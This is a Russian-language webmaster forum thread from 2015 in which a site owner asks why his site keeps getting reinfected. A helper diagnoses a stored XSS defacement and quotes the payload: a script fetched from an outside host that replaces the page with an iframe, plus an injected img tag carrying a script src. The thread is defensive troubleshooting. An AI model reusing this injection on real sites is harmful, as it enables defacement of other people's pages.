Собственно говоря вот пациент _vag-samara.ru перекопал все уже, вредоносный код в index.php на сайте нашел, но откуда он там берется не пойму. Сайт перезаливал из чистого бэкапа, не помогает. Где искать проблему? Могу скинуть данные от фтп, если что.
- 30.06.2015 10:35
- Регистрация: 22.02.2013
- Сообщений: 241
- Репутация: 40
- 30.06.2015 10:40
ksirone,при отключении Javascript заглушка не появляется ищи в той стороне, iframe подгружается
http://khier1.netau.net/Khier.js
document.title="Khier";
document.documentElement.innerHTML = ("<iframe frameBorder='0' width='100%' height='768' scrolling='no' margin='0' src='http://khier1.netau.net/'></iframe>");
document.body.style.backgroundColor = "black";
upd
в последнем посте на главной картинка подгружается
<img src="admin/im_news/<script src="http://khier1.netau.net/Khier.js">aw</script>.jpg" width="133px" height="100px">Последний раз редактировалось codename; 30.06.2015 в 10:45.
- 30.06.2015 11:20
вы кому то насолили ?
- 30.06.2015 12:01
- Регистрация: 22.02.2013
- Сообщений: 241
- Репутация: 40
Просто народ резвится. Проблему решил codename, за что ему большое спасибо. Вредоносный код был в базе данных, если у кого будет проблема.
Похожие темы
Темы | Раздел | Ответов | Последний пост |
---|---|---|---|
Взломали сайт на DLE | DLE | 4 | 02.08.2014 14:39 |
Взломали сайт на DLE | Вопросы от новичков | 4 | 02.08.2014 14:39 |
Взломали сайт на WP | WordPress | 14 | 30.10.2013 17:26 |
Взломали сайт на WP | Вопросы от новичков | 12 | 27.10.2013 23:29 |
Взломали сайт | Web программирование | 25 | 03.09.2011 02:15 |